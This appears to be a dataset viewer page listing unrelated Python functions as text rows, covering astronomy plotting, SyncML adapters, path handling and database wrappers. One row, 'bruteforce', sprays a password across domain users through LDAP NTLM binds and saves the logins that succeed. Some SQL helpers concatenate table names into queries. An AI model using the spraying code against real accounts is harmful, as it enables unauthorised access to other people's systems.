Search is not available for this dataset
text
stringlengths 75
104k
|
---|
def hr_diagram_figure(cluster):
"""
Given a cluster create a Bokeh plot figure creating an
H-R diagram.
"""
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors))
pf = figure(y_axis_type='log', x_range=x_range, name='hr',
tools='box_select,lasso_select,reset,hover',
title='H-R Diagram for {0}'.format(cluster.name))
pf.select(BoxSelectTool).select_every_mousemove = False
pf.select(LassoSelectTool).select_every_mousemove = False
hover = pf.select(HoverTool)[0]
hover.tooltips = [("Temperature (Kelvin)", "@x{0}"),
("Luminosity (solar units)", "@y{0.00}")]
_diagram(source=source, plot_figure=pf, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
return pf |
def calculate_diagram_ranges(data):
"""
Given a numpy array calculate what the ranges of the H-R
diagram should be.
"""
data = round_arr_teff_luminosity(data)
temps = data['temp']
x_range = [1.05 * np.amax(temps), .95 * np.amin(temps)]
lums = data['lum']
y_range = [.50 * np.amin(lums), 2 * np.amax(lums)]
return (x_range, y_range) |
def hr_diagram_from_data(data, x_range, y_range):
"""
Given a numpy array create a Bokeh plot figure creating an
H-R diagram.
"""
_, color_mapper = hr_diagram_color_helper([])
data_dict = {
'x': list(data['temperature']),
'y': list(data['luminosity']),
'color': list(data['color'])
}
source = ColumnDataSource(data=data_dict)
pf = figure(y_axis_type='log', x_range=x_range, y_range=y_range)
_diagram(source=source, plot_figure=pf,
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
show_with_bokeh_server(pf) |
def cluster_text_input(cluster, title=None):
"""
Create an :class:`~bokeh.models.widgets.TextInput` using
the cluster.name as the default value and title.
If no title is provided use, 'Type in the name of your cluster
and press Enter/Return:'.
"""
if not title:
title = 'Type in the name of your cluster and press Enter/Return:'
return TextInput(value=cluster.name, title=title) |
def hr_diagram_selection(cluster_name):
"""
Given a cluster create two Bokeh plot based H-R diagrams.
The Selection in the left H-R diagram will show up on the
right one.
"""
cluster = get_hr_data(cluster_name)
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors), name='hr')
source_selected = ColumnDataSource(data=dict(x=[], y=[], color=[]),
name='hr')
pf = figure(y_axis_type='log', x_range=x_range,
tools='lasso_select,reset',
title='H-R Diagram for {0}'.format(cluster.name))
_diagram(source=source, plot_figure=pf, name='hr', color={'field':
'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
pf_selected = figure(y_axis_type='log', y_range=pf.y_range,
x_range=x_range,
tools='reset',
title='H-R Diagram for {0}'.format(cluster.name))
_diagram(source=source_selected, plot_figure=pf_selected, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
source.callback = CustomJS(args=dict(source_selected=source_selected),
code="""
var inds = cb_obj.selected['1d'].indices;
var d1 = cb_obj.data;
var d2 = source_selected.data;
console.log(inds);
d2['x'] = []
d2['y'] = []
d2['color'] = []
for (i = 0; i < inds.length; i++) {
d2['x'].push(d1['x'][inds[i]])
d2['y'].push(d1['y'][inds[i]])
d2['color'].push(d1['color'][inds[i]])
}
source_selected.change.emit();
""")
show_with_bokeh_server(row(pf, pf_selected)) |
def _filter_cluster_data(self):
"""
Filter the cluster data catalog into the filtered_data
catalog, which is what is shown in the H-R diagram.
Filter on the values of the sliders, as well as the lasso
selection in the skyviewer.
"""
min_temp = self.temperature_range_slider.value[0]
max_temp = self.temperature_range_slider.value[1]
temp_mask = np.logical_and(
self.cluster.catalog['temperature'] >= min_temp,
self.cluster.catalog['temperature'] <= max_temp
)
min_lum = self.luminosity_range_slider.value[0]
max_lum = self.luminosity_range_slider.value[1]
lum_mask = np.logical_and(
self.cluster.catalog['luminosity'] >= min_lum,
self.cluster.catalog['luminosity'] <= max_lum
)
selected_mask = np.isin(self.cluster.catalog['id'], self.selection_ids)
filter_mask = temp_mask & lum_mask & selected_mask
self.filtered_data = self.cluster.catalog[filter_mask].data
self.source.data = {
'id': list(self.filtered_data['id']),
'temperature': list(self.filtered_data['temperature']),
'luminosity': list(self.filtered_data['luminosity']),
'color': list(self.filtered_data['color'])
}
logging.debug("Selected data is now: %s", self.filtered_data) |
def modify_data(data):
"""
Creates a tempfile and starts the given editor, returns the data afterwards.
"""
with tempfile.NamedTemporaryFile('w') as f:
for entry in data:
f.write(json.dumps(entry.to_dict(
include_meta=True),
default=datetime_handler))
f.write('\n')
f.flush()
print_success("Starting editor")
subprocess.call(['nano', '-', f.name])
with open(f.name, 'r') as f:
return f.readlines() |
def modify_input():
"""
This functions gives the user a way to change the data that is given as input.
"""
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
objects = [obj for obj in doc_mapper.get_pipe()]
modified = modify_data(objects)
for line in modified:
obj = doc_mapper.line_to_object(line)
obj.save()
print_success("Object(s) successfully changed")
else:
print_error("Please use this tool with pipes") |
def bruteforce(users, domain, password, host):
"""
Performs a bruteforce for the given users, password, domain on the given host.
"""
cs = CredentialSearch(use_pipe=False)
print_notification("Connecting to {}".format(host))
s = Server(host)
c = Connection(s)
for user in users:
if c.rebind(user="{}\\{}".format(domain, user.username), password=password, authentication=NTLM):
print_success('Success for: {}:{}'.format(user.username, password))
credential = cs.find_object(
user.username, password, domain=domain, host_ip=host)
if not credential:
credential = Credential(username=user.username, secret=password,
domain=domain, host_ip=host, type="plaintext", port=389)
credential.add_tag(tag)
credential.save()
# Add a tag to the user object, so we dont have to bruteforce it again.
user.add_tag(tag)
user.save()
else:
print_error("Fail for: {}:{}".format(user.username, password)) |
def Adapter(self, **kw):
'''
.. TODO:: move this documentation into model/adapter.py?...
The Adapter constructor supports the following parameters:
:param devID:
sets the local adapter\'s device identifier. For servers, this
should be the externally accessible URL that launches the SyncML
transaction, and for clients this should be a unique ID, such as
the IMEI number (for mobile phones). If not specified, it will
be defaulted to the `devID` of the `devinfo` object. If it
cannot be loaded from the database or from the `devinfo`, then
it must be provided before any synchronization can begin.
:param name:
sets the local adapter\'s device name - usually a human-friendly
description of this SyncML\'s function.
:param devinfo:
sets the local adapter :class:`pysyncml.devinfo.DeviceInfo`. If
not specified, it will be auto-loaded from the database. If it
cannot be loaded from the database, then it must be provided
before any synchronization can begin.
:param peer:
TODO: document...
:param maxGuidSize:
TODO: document...
:param maxMsgSize:
TODO: document...
:param maxObjSize:
TODO: document...
:param conflictPolicy:
sets the default conflict handling policy for this adapter,
and can be overriden on a per-store basis (applies only when
operating as the server role).
'''
try:
ret = self._model.Adapter.q(isLocal=True).one()
for k, v in kw.items():
setattr(ret, k, v)
except NoResultFound:
ret = self._model.Adapter(**kw)
ret.isLocal = True
self._model.session.add(ret)
if ret.devID is not None:
self._model.session.flush()
ret.context = self
# todo: is this really the best place to do this?...
ret.router = self.router or router.Router(ret)
ret.protocol = self.protocol or protocol.Protocol(ret)
ret.synchronizer = self.synchronizer or synchronizer.Synchronizer(ret)
ret.codec = self.codec or 'xml'
if isinstance(ret.codec, basestring):
ret.codec = codec.Codec.factory(ret.codec)
if ret.devID is not None:
peers = ret.getKnownPeers()
if len(peers) == 1 and peers[0].url is not None:
ret._peer = peers[0]
return ret |
def RemoteAdapter(self, **kw):
'''
.. TODO:: move this documentation into model/adapter.py?...
The RemoteAdapter constructor supports the following parameters:
:param url:
specifies the URL that this remote SyncML server can be reached
at. The URL must be a fully-qualified URL.
:param auth:
set what kind of authentication scheme to use, which generally is
one of the following values:
**None**:
indicates no authentication is required.
**pysyncml.NAMESPACE_AUTH_BASIC**:
specifies to use "Basic-Auth" authentication scheme.
**pysyncml.NAMESPACE_AUTH_MD5**:
specifies to use MD5 "Digest-Auth" authentication scheme.
NOTE: this may not be implemented yet...
:param username:
if the `auth` is not ``None``, then the username to authenticate
as must be provided via this parameter.
:param password:
if the `auth` is not ``None``, then the password to authenticate
with must be provided via this parameter.
'''
# TODO: is this really the right way?...
ret = self._model.Adapter(isLocal=False, **kw)
self._model.session.add(ret)
if ret.devID is not None:
self._model.session.flush()
return ret |
def pprint_path(path):
"""
print information of a pathlib / os.DirEntry() instance with all "is_*" functions.
"""
print("\n*** %s" % path)
for attrname in sorted(dir(path)):
if attrname.startswith("is_"):
value = getattr(path, attrname)
print("%20s: %s" % (attrname, value))
print() |
def utime(self, *args, **kwargs):
""" Set the access and modified times of the file specified by path. """
os.utime(self.extended_path, *args, **kwargs) |
def _from_parts(cls, args, init=True):
"""
Strip \\?\ prefix in init phase
"""
if args:
args = list(args)
if isinstance(args[0], WindowsPath2):
args[0] = args[0].path
elif args[0].startswith("\\\\?\\"):
args[0] = args[0][4:]
args = tuple(args)
return super(WindowsPath2, cls)._from_parts(args, init) |
def extended_path(self):
"""
Add prefix \\?\ to every absolute path, so that it's a "extended-length"
path, that should be longer than 259 characters (called: "MAX_PATH")
see:
https://msdn.microsoft.com/en-us/library/aa365247.aspx#maxpath
"""
if self.is_absolute() and not self.path.startswith("\\\\"):
return "\\\\?\\%s" % self.path
return self.path |
def path(self):
"""
Return the path always without the \\?\ prefix.
"""
path = super(WindowsPath2, self).path
if path.startswith("\\\\?\\"):
return path[4:]
return path |
def relative_to(self, other):
"""
Important here is, that both are always the same:
both with \\?\ prefix or both without it.
"""
return super(WindowsPath2, Path2(self.path)).relative_to(Path2(other).path) |
def format():
"""
Formats the output of another tool in the given way.
Has default styles for ranges, hosts and services.
"""
argparser = argparse.ArgumentParser(description='Formats a json object in a certain way. Use with pipes.')
argparser.add_argument('format', metavar='format', help='How to format the json for example "{address}:{port}".', nargs='?')
arguments = argparser.parse_args()
service_style = "{address:15} {port:7} {protocol:5} {service:15} {state:10} {banner} {tags}"
host_style = "{address:15} {tags}"
ranges_style = "{range:18} {tags}"
users_style = "{username}"
if arguments.format:
format_input(arguments.format)
else:
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
for obj in doc_mapper.get_pipe():
style = ''
if isinstance(obj, Range):
style = ranges_style
elif isinstance(obj, Host):
style = host_style
elif isinstance(obj, Service):
style = service_style
elif isinstance(obj, User):
style = users_style
print_line(fmt.format(style, **obj.to_dict(include_meta=True)))
else:
print_error("Please use this script with pipes") |
def print_line(text):
"""
Print the given line to stdout
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except ValueError:
pass
try:
sys.stdout.write(text)
if not text.endswith('\n'):
sys.stdout.write('\n')
sys.stdout.flush()
except IOError:
sys.exit(0) |
def draw_interface(objects, callback, callback_text):
"""
Draws a ncurses interface. Based on the given object list, every object should have a "string" key, this is whats displayed on the screen, callback is called with the selected object.
Rest of the code is modified from:
https://stackoverflow.com/a/30834868
"""
screen = curses.initscr()
height, width = screen.getmaxyx()
curses.noecho()
curses.cbreak()
curses.start_color()
screen.keypad( 1 )
curses.init_pair(1,curses.COLOR_BLACK, curses.COLOR_CYAN)
highlightText = curses.color_pair( 1 )
normalText = curses.A_NORMAL
screen.border( 0 )
curses.curs_set( 0 )
max_row = height - 15 # max number of rows
box = curses.newwin( max_row + 2, int(width - 2), 1, 1 )
box.box()
fmt = PartialFormatter()
row_num = len( objects )
pages = int( ceil( row_num / max_row ) )
position = 1
page = 1
for i in range( 1, max_row + 1 ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if (i == position):
box.addstr( i, 2, str( i ) + " - " + objects[ i - 1 ]['string'], highlightText )
else:
box.addstr( i, 2, str( i ) + " - " + objects[ i - 1 ]['string'], normalText )
if i == row_num:
break
screen.refresh()
box.refresh()
x = screen.getch()
while x != 27:
if x == curses.KEY_DOWN:
if page == 1:
if position < i:
position = position + 1
else:
if pages > 1:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
elif page == pages:
if position < row_num:
position = position + 1
else:
if position < max_row + ( max_row * ( page - 1 ) ):
position = position + 1
else:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
if x == curses.KEY_UP:
if page == 1:
if position > 1:
position = position - 1
else:
if position > ( 1 + ( max_row * ( page - 1 ) ) ):
position = position - 1
else:
page = page - 1
position = max_row + ( max_row * ( page - 1 ) )
screen.erase()
if x == ord( "\n" ) and row_num != 0:
screen.erase()
screen.border( 0 )
service = objects[position -1]
text = fmt.format(callback_text, **service)
screen.addstr( max_row + 4, 3, text)
text = callback(service)
count = 0
for line in text:
screen.addstr( max_row + 5 + count, 3, line)
count += 1
box.erase()
screen.border( 0 )
box.border( 0 )
for i in range( 1 + ( max_row * ( page - 1 ) ), max_row + 1 + ( max_row * ( page - 1 ) ) ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if ( i + ( max_row * ( page - 1 ) ) == position + ( max_row * ( page - 1 ) ) ):
box.addstr( i - ( max_row * ( page - 1 ) ), 2, str( i ) + " - " + objects[ i - 1 ]['string'], highlightText )
else:
box.addstr( i - ( max_row * ( page - 1 ) ), 2, str( i ) + " - " + objects[ i - 1 ]['string'], normalText )
if i == row_num:
break
screen.refresh()
box.refresh()
x = screen.getch()
curses.endwin()
exit() |
def get_own_ip():
"""
Gets the IP from the inet interfaces.
"""
own_ip = None
interfaces = psutil.net_if_addrs()
for _, details in interfaces.items():
for detail in details:
if detail.family == socket.AF_INET:
ip_address = ipaddress.ip_address(detail.address)
if not (ip_address.is_link_local or ip_address.is_loopback):
own_ip = str(ip_address)
break
return own_ip |
def pprint(arr, columns=('temperature', 'luminosity'),
names=('Temperature (Kelvin)', 'Luminosity (solar units)'),
max_rows=32, precision=2):
"""
Create a pandas DataFrame from a numpy ndarray.
By default use temp and lum with max rows of 32 and precision of 2.
arr - An numpy.ndarray.
columns - The columns to include in the pandas DataFrame. Defaults to
temperature and luminosity.
names - The column names for the pandas DataFrame. Defaults to
Temperature and Luminosity.
max_rows - If max_rows is an integer then set the pandas
display.max_rows option to that value. If max_rows
is True then set display.max_rows option to 1000.
precision - An integer to set the pandas precision option.
"""
if max_rows is True:
pd.set_option('display.max_rows', 1000)
elif type(max_rows) is int:
pd.set_option('display.max_rows', max_rows)
pd.set_option('precision', precision)
df = pd.DataFrame(arr.flatten(), index=arr['id'].flatten(),
columns=columns)
df.columns = names
return df.style.format({names[0]: '{:.0f}',
names[1]: '{:.2f}'}) |
def strip_labels(filename):
"""Strips labels."""
labels = []
with open(filename) as f, open('processed_labels.txt', 'w') as f1:
for l in f:
if l.startswith('#'):
next
l = l.replace(" .", '')
l = l.replace(">\tskos:prefLabel\t", ' ')
l = l.replace("<", '')
l = l.replace(">\trdfs:label\t", ' ')
f1.write(l) |
def remove_namespace(doc, namespace):
'''Remove namespace in the passed document in place.'''
ns = u'{%s}' % namespace
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
elem.attrib['oxmlns'] = namespace |
def resolve(self, uri):
""" Resolve a Resource identified by URI
:param uri: The URI of the resource to be resolved
:type uri: str
:return: the contents of the resource as a string
:rtype: str
"""
for r in self.__retrievers__:
if r.match(uri):
return r
raise UnresolvableURIError() |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
req = request("GET", uri)
return req.content, req.headers['Content-Type'] |
def match(self, uri):
""" Check to see if this URI is retrievable by this Retriever implementation
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: True if it can be, False if not
:rtype: bool
"""
absolute_uri = self.__absolute__(uri)
return absolute_uri.startswith(self.__path__) and op.exists(absolute_uri) |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
uri = self.__absolute__(uri)
mime, _ = guess_type(uri)
if "image" in mime:
return send_file(uri), mime
else:
with open(uri, "r") as f:
file = f.read()
return file, mime |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
return self.__resolver__.getTextualNode(uri).export(Mimetypes.XML.TEI), "text/xml" |
def hook(name):
'''
Decorator used to tag a method that should be used as a hook for the
specified `name` hook type.
'''
def hookTarget(wrapped):
if not hasattr(wrapped, '__hook__'):
wrapped.__hook__ = [name]
else:
wrapped.__hook__.append(name)
return wrapped
return hookTarget |
def addHook(self, name, callable):
'''
Subscribes `callable` to listen to events of `name` type. The
parameters passed to `callable` are dependent on the specific
event being triggered.
'''
if name not in self._hooks:
self._hooks[name] = []
self._hooks[name].append(callable) |
def _makeAdapter(self):
'''
Creates a tuple of ( Context, Adapter ) based on the options
specified by `self.options`. The Context is the pysyncml.Context created for
the storage location specified in `self.options`, and the Adapter is a newly
created Adapter if a previously created one was not found.
'''
self._callHooks('adapter.create.init')
# create a new pysyncml.Context. the main function that this provides is
# to give the Adapter a storage engine to store state information across
# synchronizations.
context = pysyncml.Context(storage='sqlite:///%ssyncml.db' % (self.dataDir,),
owner=None, autoCommit=True)
self._callHooks('adapter.create.context', context)
# create an Adapter from the current context. this will either create
# a new adapter, or load the current local adapter for the specified
# context storage location. if it is new, then lots of required
# information (such as device info) will not be set, so we need to
# check that and specify it if missing.
adapter = context.Adapter()
if hasattr(self, 'serverConf') and self.serverConf.policy is not None:
adapter.conflictPolicy = self.serverConf.policy
if self.options.name is not None or self.appDisplay is not None:
adapter.name = self.options.name or self.appDisplay
# TODO: stop ignoring ``self.options.remoteUri``... (the router must first support
# manual routes...)
# if self.options.remoteUri is not None:
# adapter.router.addRoute(self.agent.uri, self.options.remoteUri)
if adapter.devinfo is None:
log.info('adapter has no device info - registering new device')
else:
if self.options.devid is not None and self.options.devid != adapter.devinfo.devID:
log.info('adapter has different device ID - overwriting with new device info')
adapter.devinfo = None
if adapter.devinfo is None:
# setup some information about the local device, most importantly the
# device ID, which the remote peer will use to uniquely identify this peer
devinfoParams = dict(
devID = self.options.devid or self.defaultDevID,
devType = pysyncml.DEVTYPE_SERVER if self.options.server else \
pysyncml.DEVTYPE_WORKSTATION,
manufacturerName = 'pysyncml',
modelName = self.appLabel,
softwareVersion = pysyncml.version,
hierarchicalSync = self.agent.hierarchicalSync if self.agent is not None else False,
)
if self.devinfoParams is not None:
devinfoParams.update(self.devinfoParams)
adapter.devinfo = context.DeviceInfo(**devinfoParams)
self._callHooks('adapter.create.adapter', context, adapter)
if not self.options.server:
# servers don't have a fixed peer; i.e. the SyncML message itself
# defines which peer is connecting.
if adapter.peer is None:
if self.options.remote is None:
self.options.remote = raw_input('SyncML remote URL: ')
if self.options.username is None:
self.options.username = raw_input('SyncML remote username (leave empty if none): ')
if len(self.options.username) <= 0:
self.options.username = None
log.info('adapter has no remote info - registering new remote adapter')
else:
if self.options.remote is not None:
if self.options.remote != adapter.peer.url \
or self.options.username != adapter.peer.username \
or self.options.password != adapter.peer.password:
#or self.options.password is not None:
log.info('adapter has invalid or rejected remote info - overwriting with new remote info')
adapter.peer = None
if adapter.peer is None:
auth = None
if self.options.username is not None:
auth = pysyncml.NAMESPACE_AUTH_BASIC
if self.options.password is None:
self.options.password = getpass.getpass('SyncML remote password: ')
# setup the remote connection parameters, if not already stored in
# the adapter sync tables or the URL has changed.
adapter.peer = context.RemoteAdapter(
url = self.options.remote,
auth = auth,
username = self.options.username,
password = self.options.password,
)
self._callHooks('adapter.create.peer', context, adapter, adapter.peer)
# add a datastore attached to the URI "note". the actual value of
# the URI is irrelevant - it is only an identifier for this item
# synchronization channel. it must be unique within this adapter
# and must stay consistent across synchronizations.
# TODO: this check should be made redundant... (ie. once the
# implementation of Store.merge() is fixed this will
# become a single "addStore()" call without the check first).
uri = self.storeParams.get('uri', self.appLabel)
if uri in adapter.stores:
store = adapter.stores[uri]
store.agent = self.agent
else:
storeParams = dict(
uri = uri,
displayName = self.options.name or self.appDisplay,
agent = self.agent,
# TODO: adding this for funambol-compatibility...
maxObjSize = None)
if self.storeParams is not None:
storeParams.update(self.storeParams)
store = adapter.addStore(context.Store(**storeParams))
self._callHooks('adapter.create.store', context, adapter, store)
if self.options.local:
def locprint(msg):
print msg
else:
locprint = log.info
def showChanges(changes, prefix):
for c in changes:
if c.state != pysyncml.ITEM_DELETED:
item = self.agent.getItem(c.itemID)
else:
item = 'Item ID %s' % (c.itemID,)
locprint('%s - %s: %s' % (prefix, item, pysyncml.state2string(c.state)))
if self.options.server:
peers = adapter.getKnownPeers()
if len(peers) > 0:
locprint('Pending changes to propagate:')
else:
locprint('No pending changes to propagate (no peers yet)')
for peer in peers:
for puri, pstore in peer.stores.items():
if pstore.binding is None or pstore.binding.uri != store.uri:
continue
changes = list(pstore.getRegisteredChanges())
if len(changes) <= 0:
locprint(' Registered to peer "%s" URI "%s": (none)' % (peer.devID, puri))
else:
locprint(' Registered to peer "%s" URI "%s":' % (peer.devID, puri))
showChanges(changes, ' ')
else:
if store.peer is None:
locprint('No pending local changes (not associated yet).')
else:
changes = list(store.peer.getRegisteredChanges())
if len(changes) <= 0:
locprint('No pending local changes to synchronize.')
else:
locprint('Pending local changes:')
showChanges(changes, '')
self._callHooks('adapter.create.term', context, adapter)
return (context, adapter) |
def configure(self, argv=None):
'''
Configures this engine based on the options array passed into
`argv`. If `argv` is ``None``, then ``sys.argv`` is used instead.
During configuration, the command line options are merged with
previously stored values. Then the logging subsystem and the
database model are initialized, and all storable settings are
serialized to configurations files.
'''
self._setupOptions()
self._parseOptions(argv)
self._setupLogging()
self._setupModel()
self.dbsession.commit()
return self |
def run(self, stdout=sys.stdout, stderr=sys.stderr):
'''
Runs this SyncEngine by executing one of the following functions
(as controlled by command-line options or stored parameters):
* Display local pending changes.
* Describe local configuration.
* Run an HTTP server and engage server-side mode.
* Connect to a remote SyncML peer and engage client-side mode.
NOTE: when running in the first two modes, all database interactions
are rolled back in order to keep the SyncEngine idempotent.
'''
if self.options.local or self.options.describe:
context, adapter = self._makeAdapter()
if self.options.describe:
self.describe(stdout)
adapter.describe(stdout)
self.dbsession.rollback()
return 0
if self.options.server:
return self._runServer(stdout, stderr)
return self._runClient(stdout, stderr) |
def _assemble_with_columns(self, sql_str, columns, *args, **kwargs):
"""
Format a select statement with specific columns
:sql_str: An SQL string template
:columns: The columns to be selected and put into {0}
:*args: Arguments to use as query parameters.
:returns: Psycopg2 compiled query
"""
# Handle any aliased columns we get (e.g. table_alias.column)
qcols = []
for col in columns:
if '.' in col:
# Explodeded it
wlist = col.split('.')
# Reassemble into string and drop it into the list
qcols.append(sql.SQL('.').join([sql.Identifier(x) for x in wlist]))
else:
qcols.append(sql.Identifier(col))
# sql.SQL(', ').join([sql.Identifier(x) for x in columns]),
query_string = sql.SQL(sql_str).format(
sql.SQL(', ').join(qcols),
*[sql.Literal(a) for a in args]
)
return query_string |
def _assemble_select(self, sql_str, columns, *args, **kwargs):
""" Alias for _assemble_with_columns
"""
warnings.warn("_assemble_select has been depreciated for _assemble_with_columns. It will be removed in a future version.", DeprecationWarning)
return self._assemble_with_columns(sql_str, columns, *args, **kwargs) |
def _assemble_simple(self, sql_str, *args, **kwargs):
"""
Format a select statement with specific columns
:sql_str: An SQL string template
:*args: Arguments to use as query parameters.
:returns: Psycopg2 compiled query
"""
query_string = sql.SQL(sql_str).format(
*[sql.Literal(a) for a in args]
)
return query_string |
def _execute(self, query, commit=False, working_columns=None):
"""
Execute a query with provided parameters
Parameters
:query: SQL string with parameter placeholders
:commit: If True, the query will commit
:returns: List of rows
"""
log.debug("RawlBase._execute()")
result = []
if working_columns is None:
working_columns = self.columns
with RawlConnection(self.dsn) as conn:
query_id = random.randrange(9999)
curs = conn.cursor()
try:
log.debug("Executing(%s): %s" % (query_id, query.as_string(curs)))
except:
log.exception("LOGGING EXCEPTION LOL")
curs.execute(query)
log.debug("Executed")
if commit == True:
log.debug("COMMIT(%s)" % query_id)
conn.commit()
log.debug("curs.rowcount: %s" % curs.rowcount)
if curs.rowcount > 0:
#result = curs.fetchall()
# Process the results into a dict and stuff it in a RawlResult
# object. Then append that object to result
result_rows = curs.fetchall()
for row in result_rows:
i = 0
row_dict = {}
for col in working_columns:
try:
#log.debug("row_dict[%s] = row[%s] which is %s" % (col, i, row[i]))
# For aliased columns, we need to get rid of the dot
col = col.replace('.', '_')
row_dict[col] = row[i]
except IndexError: pass
i += 1
log.debug("Appending dict to result: %s" % row_dict)
rr = RawlResult(working_columns, row_dict)
result.append(rr)
curs.close()
return result |
def process_columns(self, columns):
"""
Handle provided columns and if necessary, convert columns to a list for
internal strage.
:columns: A sequence of columns for the table. Can be list, comma
-delimited string, or IntEnum.
"""
if type(columns) == list:
self.columns = columns
elif type(columns) == str:
self.columns = [c.strip() for c in columns.split()]
elif type(columns) == IntEnum:
self.columns = [str(c) for c in columns]
else:
raise RawlException("Unknown format for columns") |
def query(self, sql_string, *args, **kwargs):
"""
Execute a DML query
:sql_string: An SQL string template
:*args: Arguments to be passed for query parameters.
:commit: Whether or not to commit the transaction after the query
:returns: Psycopg2 result
"""
commit = None
columns = None
if kwargs.get('commit') is not None:
commit = kwargs.pop('commit')
if kwargs.get('columns') is not None:
columns = kwargs.pop('columns')
query = self._assemble_simple(sql_string, *args, **kwargs)
return self._execute(query, commit=commit, working_columns=columns) |
def select(self, sql_string, cols, *args, **kwargs):
"""
Execute a SELECT statement
:sql_string: An SQL string template
:columns: A list of columns to be returned by the query
:*args: Arguments to be passed for query parameters.
:returns: Psycopg2 result
"""
working_columns = None
if kwargs.get('columns') is not None:
working_columns = kwargs.pop('columns')
query = self._assemble_select(sql_string, cols, *args, *kwargs)
return self._execute(query, working_columns=working_columns) |
def insert_dict(self, value_dict, commit=False):
"""
Execute an INSERT statement using a python dict
:value_dict: A dictionary representing all the columns(keys) and
values that should be part of the INSERT statement
:commit: Whether to automatically commit the transaction
:returns: Psycopg2 result
"""
# Sanity check the value_dict
for key in value_dict.keys():
if key not in self.columns:
raise ValueError("Column %s does not exist" % key)
# These lists will make up the columns and values of the INSERT
insert_cols = []
value_set = []
# Go through all the possible columns and look for that column in the
# dict. If available, we need to add it to our col/val sets
for col in self.columns:
if col in value_dict:
#log.debug("Inserting with column %s" % col)
insert_cols.append(col)
value_set.append(value_dict[col])
# Create SQL statement placeholders for the dynamic values
placeholders = ', '.join(["{%s}" % x for x in range(1, len(value_set) + 1)])
# TODO: Maybe don't trust table_name ane pk_name? Shouldn't really be
# user input, but who knows.
query = self._assemble_with_columns('''
INSERT INTO "''' + self.table + '''" ({0})
VALUES (''' + placeholders + ''')
RETURNING ''' + self.pk + '''
''', insert_cols, *value_set)
result = self._execute(query, commit=commit)
# Inca
if len(result) > 0:
# Return the pk if we can
if hasattr(result[0], self.pk):
return getattr(result[0], self.pk)
# Otherwise, the full result
else:
return result[0]
else:
return None |
def get(self, pk):
"""
Retreive a single record from the table. Lots of reasons this might be
best implemented in the model
:pk: The primary key ID for the record
:returns: List of single result
"""
if type(pk) == str:
# Probably an int, give it a shot
try:
pk = int(pk)
except ValueError: pass
return self.select(
"SELECT {0} FROM " + self.table + " WHERE " + self.pk + " = {1};",
self.columns, pk) |
def dump(self, stream, contentType=None, version=None):
'''
Serializes this FileItem to a byte-stream and writes it to the
file-like object `stream`. `contentType` and `version` must be one
of the supported content-types, and if not specified, will default
to ``application/vnd.omads-file``.
'''
if contentType is None:
contentType = constants.TYPE_OMADS_FILE
if ctype.getBaseType(contentType) != constants.TYPE_OMADS_FILE:
raise common.InvalidContentType('cannot serialize FileItem to "%s"' % (contentType,))
if version is None:
version = '1.2'
if version != '1.2':
raise common.InvalidContentType('invalid file serialization version "%s"' % (version,))
root = ET.Element('File')
if self.name is not None:
ET.SubElement(root, 'name').text = self.name
# todo: do anything with "parent"?...
for attr in ('created', 'modified', 'accessed'):
if getattr(self, attr) is None:
continue
ET.SubElement(root, attr).text = common.ts_iso(getattr(self, attr))
if self.contentType is not None:
ET.SubElement(root, 'cttype').text = self.contentType
attrs = [attr
for attr in ('hidden', 'system', 'archived', 'delete', 'writable', 'readable', 'executable')
if getattr(self, attr) is not None]
if len(attrs) > 0:
xa = ET.SubElement(root, 'attributes')
for attr in attrs:
ET.SubElement(xa, attr[0]).text = 'true' if getattr(self, attr) else 'false'
if self.body is not None:
ET.SubElement(root, 'body').text = self.body
if self.body is None and self.size is not None:
ET.SubElement(root, 'size').text = str(self.size)
if len(self.extensions) > 0:
xe = ET.SubElement(root, 'Ext')
for name, values in self.extensions.items():
ET.SubElement(xe, 'XNam').text = name
for value in values:
ET.SubElement(xe, 'XVal').text = value
ET.ElementTree(root).write(stream)
return (constants.TYPE_OMADS_FILE + '+xml', '1.2') |
def load(cls, stream, contentType=None, version=None):
'''
Reverses the effects of the :meth:`dump` method, creating a FileItem
from the specified file-like `stream` object.
'''
if contentType is None:
contentType = constants.TYPE_OMADS_FILE
if ctype.getBaseType(contentType) == constants.TYPE_OMADS_FOLDER:
from .folder import FolderItem
return FolderItem.load(stream, contentType, version)
if ctype.getBaseType(contentType) != constants.TYPE_OMADS_FILE:
raise common.InvalidContentType('cannot de-serialize FileItem from "%s"' % (contentType,))
if version is None:
version = '1.2'
if version != '1.2':
raise common.InvalidContentType('invalid FileItem de-serialization version "%s"' % (version,))
ret = FileItem()
data = stream.read()
xdoc = ET.fromstring(data)
if xdoc.tag != 'File':
raise common.InvalidContent('root of application/vnd.omads-file XML must be "File" not "%s"'
% (xdoc.tag,))
ret.name = xdoc.findtext('name')
